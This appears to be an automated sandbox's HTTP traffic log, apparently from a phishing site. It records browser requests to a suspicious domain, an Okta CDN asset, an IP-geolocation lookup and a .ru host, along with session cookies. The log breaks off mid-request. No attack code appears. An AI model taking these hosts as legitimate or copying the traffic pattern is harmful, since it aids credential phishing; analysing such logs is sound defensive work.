Source: global traffic	HTTP traffic detected: GET /uvoKKbZekhhECC44QCCbjXEKE2C1RQMtxPtj677UAOI8HCXxWVsm7VzpvJUgh260 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImZGMUFVc1RsUitTa1NhUXYvaCtvK1E9PSIsInZhbHVlIjoiK0I5QXNPWERMcFJvenVtNGg3RDNFajZPV1RtaXFYUDJteDZOOVU3eitibVUya2tienhIWklKaEpyenhzcS9YUjZoYU02bkVzUU9raUlGbUlaeHNra0tXSDQ0MzhDRVRrU2NyZktpMUw5NStJeDFmWCtFUlRwb0NOU2w5RSt1emEiLCJtYWMiOiIyN2NlNGZjMmU4MGE1NWUyYTBlMTdiNjUwZDBlNzJmN2ViZjg0ZTUzYzExMDYyODE2YThiNjM1YWZmZGU2ZGQ5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlZ5SHJVUkJmaXVEQzFnbG5BOGp0Y3c9PSIsInZhbHVlIjoiaFdaSFp6bVVQcHhqWmZvejRzZnR3TDloaW9LRG01UkZWaWRMWDdIUGRYSi9wZzNtQjVka2htVTQxaEhmeGZOK0lZQWdMb1hvWGVDNlZMTy9tUC9tekRuQmxzMlYvZzlMbXlxSjdmeUJNVlZvWkNNdDBoTTlLWmtWVGYwaVQ0T0EiLCJtYWMiOiJhODcwNTAyNDRkMjUwZTdhZmQzNGY2MGI2NTQ3NzVlNGFkMzUzYzc1OWNhZDUxOTJjOGIzMTlhMmNmODgzYjI4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /fs/bcg/4/gfsh9pi7jcWKJKMAs1t7 HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /v1/ip/geo.json HTTP/1.1Host: get.geojs.ioConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/javascript, /; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: https://3pz.bughtswo.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://3pz.bughtswo.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /v1/ip/geo.json HTTP/1.1Host: get.geojs.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /pcjgktyoyaysvmnpsseafsrkslpumfzh9xa3ziatrn40zfgb8qgw?XDZZMGXXGMZWWSUFWLHJH HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://3pz.bughtswo.com/admi/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImZGMUFVc1RsUitTa1NhUXYvaCtvK1E9PSIsInZhbHVlIjoiK0I5QXNPWERMcFJvenVtNGg3RDNFajZPV1RtaXFYUDJteDZOOVU3eitibVUya2tienhIWklKaEpyenhzcS9YUjZoYU02bkVzUU9raUlGbUlaeHNra0tXSDQ0MzhDRVRrU2NyZktpMUw5NStJeDFmWCtFUlRwb0NOU2w5RSt1emEiLCJtYWMiOiIyN2NlNGZjMmU4MGE1NWUyYTBlMTdiNjUwZDBlNzJmN2ViZjg0ZTUzYzExMDYyODE2YThiNjM1YWZmZGU2ZGQ5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlZ5SHJVUkJmaXVEQzFnbG5BOGp0Y3c9PSIsInZhbHVlIjoiaFdaSFp6bVVQcHhqWmZvejRzZnR3TDloaW9LRG01UkZWaWRMWDdIUGRYSi9wZzNtQjVka2htVTQxaEhmeGZOK0lZQWdMb1hvWGVDNlZMTy9tUC9tekRuQmxzMlYvZzlMbXlxSjdmeUJNVlZvWkNNdDBoTTlLWmtWVGYwaVQ0T0EiLCJtYWMiOiJhODcwNTAyNDRkMjUwZTdhZmQzNGY2MGI2NTQ3NzVlNGFkMzUzYzc1OWNhZDUxOTJjOGIzMTlhMmNmODgzYjI4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /admi/ HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://3pz.bughtswo.com/pcjgktyoyaysvmnpsseafsrkslpumfzh9xa3ziatrn40zfgb8qgw?XDZZMGXXGMZWWSUFWLHJHAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ik50VGlCek1DR2xDSG1Xb3MzNkRwZFE9PSIsInZhbHVlIjoiTnNjdGRaQitPM25hM09XYU1nR1lIdEFyYmlSRmxkRnEwUlBQdTVXMjBzS1RvbHFDNnVqbDI0UzBrc1RsQ3RnUElUalZVSU5JbUtCZEN3N1BLZDh1dFhNNkdES2p2S0pGNmFNVEI5dzlEZ1l3QlhubENURGNONDVYeWNDYkRaWTEiLCJtYWMiOiJmZjM4NDdmMjBlYjhjMDY3MGRjYjM0YmM3Nzc5YmJlYzdiZjdkYmViZTk3ZmNjNWE2ODc1YjczMmVjZDJhMTIzIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Imw5NWUvdDRYKzgwZ1RVY0pXNGVDTXc9PSIsInZhbHVlIjoiZXd6YnU3ZU1CMWMwbmtjUmdpVHJVdDBES01GWi8zcFFiSWVlZElvNG9lRkpFV2VTYUcwSWw5eldVRk1UOW1UUmU1VzhveUVpZlhCUlhJZlF4SHFWQUdORTFtVjhmeHd1TmFzUWljRjlFeDJFcUpHV1hSQ3FuOVZhSTBoWmRpNWgiLCJtYWMiOiIwMDUxNDcxZDM5NzQ4OTg2NWJhZDBkM2FmMTMzYjUyNmU0NTg0ZjYyMTk3NzA4YTkyOWU4ODZmMGFkZjU4NDkwIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /admi/ HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://3pz.bughtswo.com/pcjgktyoyaysvmnpsseafsrkslpumfzh9xa3ziatrn40zfgb8qgw?XDZZMGXXGMZWWSUFWLHJHAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlQrdWpDS1NjanpDMEVVS2Fpc29YSlE9PSIsInZhbHVlIjoiUWFzd2JyeWVmd2U3YTAzTVpHZjdCVHZFbUpWZTJWQ1h0VTdKZ2FNZTgvenI4RG9RUG9LaDFySlFXN3RjM2tnYURJNnk5bFVBZElLUU1RZ0ZENnErWEZBYnVBMGRrT2VLcjZ6bGZ2c3ZQMWp6aEIweWlxSmZ6QlJGNUtBUi82TmMiLCJtYWMiOiIyN2QwOTQ0ZWJlNWFmZDFhZWE2N2U1ZWJlNzdlMjQ5ZDdkZjg4MDljNzM3YzQ5MWQ5MjQ0N2RhNTcyZTk5YTA3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IklkNUNwWU5pTU1kanROVkx4WjIrcGc9PSIsInZhbHVlIjoibnIrdDgyeGRrQkxoTUtoQ2F4MnRuV1BPdzJtU2tXTGtDVEdLS2hNbU42cFBxR3JVbU9MeUlvVitqclp0QmlZb2o3U2xEajVMb1ExeGpZR05qcW5kNnF6SDdqMmJSTkl4MzlabVo2VXZYV09kendLbFFmbmpWY0NuK0FYVGtGQ0QiLCJtYWMiOiI1NjIxODNhOGIzNjQ0YjEyZTliNDBjNjk4YTMwMmExNGE0MTgwMDFhODIzMzk2Nzg0YmQ2MDQxOWIxMGRjMTg5IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /favicon.png HTTP/1.1Host: developers.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://3pz.bughtswo.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=ecnS.mYWfjgtSPeKE.VU0essmRbbGKBeDJcHf7fAH_Y-1742259281-1.0.1.1-v_dqiAENN0EBJmyIrLQN3cxB2AWrIxXEj5vblXMAhtsxWjNV089KkK7pBCSOsnwCePZUAfAA7PF5PO7nLUgptte98O2WqxuLSl2k.SeC2dUIf-None-Match: "6be7ff94b6151f8cfbf08b53a17e2ac1"
Source: global traffic	HTTP traffic detected: GET /favicon.png HTTP/1.1Host: developers.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=ecnS.mYWfjgtSPeKE.VU0essmRbbGKBeDJcHf7fAH_Y-1742259281-1.0.1.1-v_dqiAENN0EBJmyIrLQN3cxB2AWrIxXEj5vblXMAhtsxWjNV089KkK7pBCSOsnwCePZUAfAA7PF5PO7nLUgptte98O2WqxuLSl2k.SeC2dUIf-None-Match: "6be7ff94b6151f8cfbf08b53a17e2ac1"
Source: global traffic	HTTP traffic detected: GET /kella$0zphou HTTP/1.1Host: r7hi.qakaco.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Origin: https://3pz.bughtswo.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://3pz.bughtswo.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /kella$0zphou HTTP/1.1Host: r7hi.qakaco.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /admi/ HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://3pz.bughtswo.com/admi/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImY3U01rLzJHWHRRSDlVTWlReXlXMVE9PSIsInZhbHVlIjoieGM5LzR5K3VOS0FJaEo2d2Q0ZStYN3hSaGEweWI5bUE2TlkveXdCdzlabmRSSVVaU091dTArZWNJdUQzb2FYQ3QwaWkvMEtJRWs5bzQ1ZnZOTnlCVDZVZkVaZnVRZHZYNW9PdnZIaGI5b2dOQWFFdmZLcWJrd3cwcEJwMFdNVWgiLCJtYWMiOiI1ZTgxMGI5ZWRmNTM5ZWUyMjQ0ZGQ0ZWMwMzBkZjI4OGYwNDY5ZWMwNDVmYzg0OGQ1ZmVkZTU4NWJlYjJkMjhhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkpDVngxVkFENnE5YU1KOWExSFR0Znc9PSIsInZhbHVlIjoia2cxbmpMbVNJZXp1Z0NacVJabDVlcFJnNVh3ZXlKbitXZDI4ZWptd1Brbm9jRjE5aUYxMGRKaUhOTVNRU25pOFRCTkYyZTVPVmIxVlFiK0orK082S1dTdU9mczYwSlNFc0d6T0E3TjdRY0d5NTJpcWd5eERwLzBhZ0NUUHFjd3oiLCJtYWMiOiJhNzM4YzA0MWY2ZGVjNjZjYmVmYTM3NDQ1M2E0NTRkZDgwZWRlYTMzNGEyMjQwMGEwMjJmNGFmMGMwNGMwZWIyIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /wpE72XVhb4Z1pXQe52oRXxRmo HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImY3U01rLzJHWHRRSDlVTWlReXlXMVE9PSIsInZhbHVlIjoieGM5LzR5K3VOS0FJaEo2d2Q0ZStYN3hSaGEweWI5bUE2TlkveXdCdzlabmRSSVVaU091dTArZWNJdUQzb2FYQ3QwaWkvMEtJRWs5bzQ1ZnZOTnlCVDZVZkVaZnVRZHZYNW9PdnZIaGI5b2dOQWFFdmZLcWJrd3cwcEJwMFdNVWgiLCJtYWMiOiI1ZTgxMGI5ZWRmNTM5ZWUyMjQ0ZGQ0ZWMwMzBkZjI4OGYwNDY5ZWMwNDVmYzg0OGQ1ZmVkZTU4NWJlYjJkMjhhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkpDVngxVkFENnE5YU1KOWExSFR0Znc9PSIsInZhbHVlIjoia2cxbmpMbVNJZXp1Z0NacVJabDVlcFJnNVh3ZXlKbitXZDI4ZWptd1Brbm9jRjE5aUYxMGRKaUhOTVNRU25pOFRCTkYyZTVPVmIxVlFiK0orK082S1dTdU9mczYwSlNFc0d6T0E3TjdRY0d5NTJpcWd5eERwLzBhZ0NUUHFjd3oiLCJtYWMiOiJhNzM4YzA0MWY2ZGVjNjZjYmVmYTM3NDQ1M2E0NTRkZDgwZWRlYTMzNGEyMjQwMGEwMjJmNGFmMGMwNGMwZWIyIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /zc8QtV1AgOx9d4g80BylSMR67CLPWQsWgy HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ii8wUUdQdjhPakNkRjFVYlNodDVHNEE9PSIsInZhbHVlIjoiWXlHZWw5YTlHblk5TFpIclo4Rytjam9xdlVqK3VsVjFNelFFaFQ4NGNEWXRsMFRMWVMxeUV5UlRocmtWaDVRdHdQNk8vbmh4T3d1MDA5VC9vUTRJU1pFbGliRHJ0VHB4dE5XYlh5VC9Jenk4ZitQSHE5SE5UT2RrUGVQQVVTWjgiLCJtYWMiOiIwMGY4YWM5MmUxZmNkZjJiZmJkMzdkMGIyZGMyOWE4MmE2NDEyYmM1YTI3ZGNhOWQyZjdkYjc3YzY1OWVkMGJhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im96ei9UaUtSelMwcVdvM2dLSm05QlE9PSIsInZhbHVlIjoicnFaRnc1bERVVlVQakRPdVRNd3FaZVNvWGR0dmszWHJUQUdiWWErZEw4Tk01SW5HOVFJZFVLejBTQ0ZBczk3RkZYUytIWjM4VXpIZ1N4TytPcEpVYnVXbGY4cUNxQXJmWi93SXdCekpiVk9DNEVadW1HMHN5VlhhcnBCQ0N6THUiLCJtYWMiOiJjNjYzZGE2NmZhNjc0NWJjZjc3ZGU0NjMxNzVhNzQxMzJiOTc1YjhlM2I2MTIxYzAxZGIwMDZlZTBhMTNjZjk2IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /sfhyazpyvwddcmilfwzwiezbwzfvcgaogmofrlsmehgvokyu6fchdw70og3s1exjhnjhzth?FYUMHQNFQOGWNOVWIZSTJFOWK HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://3pz.bughtswo.com/admi/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ii8wUUdQdjhPakNkRjFVYlNodDVHNEE9PSIsInZhbHVlIjoiWXlHZWw5YTlHblk5TFpIclo4Rytjam9xdlVqK3VsVjFNelFFaFQ4NGNEWXRsMFRMWVMxeUV5UlRocmtWaDVRdHdQNk8vbmh4T3d1MDA5VC9vUTRJU1pFbGliRHJ0VHB4dE5XYlh5VC9Jenk4ZitQSHE5SE5UT2RrUGVQQVVTWjgiLCJtYWMiOiIwMGY4YWM5MmUxZmNkZjJiZmJkMzdkMGIyZGMyOWE4MmE2NDEyYmM1YTI3ZGNhOWQyZjdkYjc3YzY1OWVkMGJhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im96ei9UaUtSelMwcVdvM2dLSm05QlE9PSIsInZhbHVlIjoicnFaRnc1bERVVlVQakRPdVRNd3FaZVNvWGR0dmszWHJUQUdiWWErZEw4Tk01SW5HOVFJZFVLejBTQ0ZBczk3RkZYUytIWjM4VXpIZ1N4TytPcEpVYnVXbGY4cUNxQXJmWi93SXdCekpiVk9DNEVadW1HMHN5VlhhcnBCQ0N6THUiLCJtYWMiOiJjNjYzZGE2NmZhNjc0NWJjZjc3ZGU0NjMxNzVhNzQxMzJiOTc1YjhlM2I2MTIxYzAxZGIwMDZlZTBhMTNjZjk2IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /12cgfpYt7Gg84zxyfkj8918 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,/;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://3pz.bughtswo.com/sfhyazpyvwddcmilfwzwiezbwzfvcgaogmofrlsmehgvokyu6fchdw70og3s1exjhnjhzth?FYUMHQNFQOGWNOVWIZSTJFOWKAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkUrajFSb0taMGFVQmRRa1BRQ2dPR2c9PSIsInZhbHVlIjoiYmd1QnpZZ1VqdEFQQXZ0b29FWTJTWEtMZ0ltS2s3OXAvV0NrdDRtN3E1OURPSTRrTWpZZEVvdjNMZEh5TGgvVXIzcHhtdDNVSVkwYlFhb05MU1d1NmJ2bTUwdVBHT293cDRlaTRKREVJcitDNHRHdVkrYXBtUmlHVTU0a3o5d0kiLCJtYWMiOiI3ZGFkMDI3M2UxYWJmN2ZmYjljYWViMGY4ZTk0ZWFkMzI4NmJmOWJiY2M5ZDU2OTAyZjZkMWUwZmIwM2U4MDQ3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlRQTjBIU1JEcEp5Rko0SCs5RFlOd2c9PSIsInZhbHVlIjoiRCtaSnFZNFFZM0VHaHBOMXJsQ3VoN040dFlmcHlZQlE4RlhZVitTWFhuTXNLVms0czhVbWpyelhJdkhYZkFoMGR5bnZBTGtKZEd3ZGxST1ZmQ3Q5QTUwSHZ6UEJiT3BabkltVVZRL2RvZ0pjdDFTWjZSMUpPWURNRVBGV3RPa0MiLCJtYWMiOiJlZmNmMDEyOTZmMDlhMzc1ZmRlNzliYjkyNTdiOTYxOGU2MzNlZTE1NWQ1NzMyMWMxODk3NGJmYjE1ZmY1ODUyIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /xyI3O4tCtbzsOtrs132Ycd30 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,/;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://3pz.bughtswo.com/sfhyazpyvwddcmilfwzwiezbwzfvcgaogmofrlsmehgvokyu6fchdw70og3s1exjhnjhzth?FYUMHQNFQOGWNOVWIZSTJFOWKAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkUrajFSb0taMGFVQmRRa1BRQ2dPR2c9PSIsInZhbHVlIjoiYmd1QnpZZ1VqdEFQQXZ0b29FWTJTWEtMZ0ltS2s3OXAvV0NrdDRtN3E1OURPSTRrTWpZZEVvdjNMZEh5TGgvVXIzcHhtdDNVSVkwYlFhb05MU1d1NmJ2bTUwdVBHT293cDRlaTRKREVJcitDNHRHdVkrYXBtUmlHVTU0a3o5d0kiLCJtYWMiOiI3ZGFkMDI3M2UxYWJmN2ZmYjljYWViMGY4ZTk0ZWFkMzI4NmJmOWJiY2M5ZDU2OTAyZjZkMWUwZmIwM2U4MDQ3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlRQTjBIU1JEcEp5Rko0SCs5RFlOd2c9PSIsInZhbHVlIjoiRCtaSnFZNFFZM0VHaHBOMXJsQ3VoN040dFlmcHlZQlE4RlhZVitTWFhuTXNLVms0czhVbWpyelhJdkhYZkFoMGR5bnZBTGtKZEd3ZGxST1ZmQ3Q5QTUwSHZ6UEJiT3BabkltVVZRL2RvZ0pjdDFTWjZSMUpPWURNRVBGV3RPa0MiLCJtYWMiOiJlZmNmMDEyOTZmMDlhMzc1ZmRlNzliYjkyNTdiOTYxOGU2MzNlZTE1NWQ1NzMyMWMxODk3NGJmYjE1ZmY1ODUyIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /56lW6APRQ2ESm07QQ6vYBzijnmTAv3b989110 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://3pz.bughtswo.com/sfhyazpyvwddcmilfwzwiezbwzfvcgaogmofrlsmehgvokyu6fchdw70og3s1exjhnjhzth?FYUMHQNFQOGWNOVWIZSTJFOWKAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkUrajFSb0taMGFVQmRRa1BRQ2dPR2c9PSIsInZhbHVlIjoiYmd1QnpZZ1VqdEFQQXZ0b29FWTJTWEtMZ0ltS2s3OXAvV0NrdDRtN3E1OURPSTRrTWpZZEVvdjNMZEh5TGgvVXIzcHhtdDNVSVkwYlFhb05MU1d1NmJ2bTUwdVBHT293cDRlaTRKREVJcitDNHRHdVkrYXBtUmlHVTU0a3o5d0kiLCJtYWMiOiI3ZGFkMDI3M2UxYWJmN2ZmYjljYWViMGY4ZTk0ZWFkMzI4NmJmOWJiY2M5ZDU2OTAyZjZkMWUwZmIwM2U4MDQ3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlRQTjBIU1JEcEp5Rko0SCs5RFlOd2c9PSIsInZhbHVlIjoiRCtaSnFZNFFZM0VHaHBOMXJsQ3VoN040dFlmcHlZQlE4RlhZVitTWFhuTXNLVms0czhVbWpyelhJdkhYZkFoMGR5bnZBTGtKZEd3ZGxST1ZmQ3Q5QTUwSHZ6UEJiT3BabkltVVZRL2RvZ0pjdDFTWjZSMUpPWURNRVBGV3RPa0MiLCJtYWMiOiJlZmNmMDEyOTZmMDlhMzc1ZmRlNzliYjkyNTdiOTYxOGU2MzNlZTE1NWQ1NzMyMWMxODk3NGJmYjE1ZmY1ODUyIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /fent/randexp.js/releases/download/v0.4.3/randexp.min.js HTTP/1.1Host: github.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://3pz.bughtswo.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: 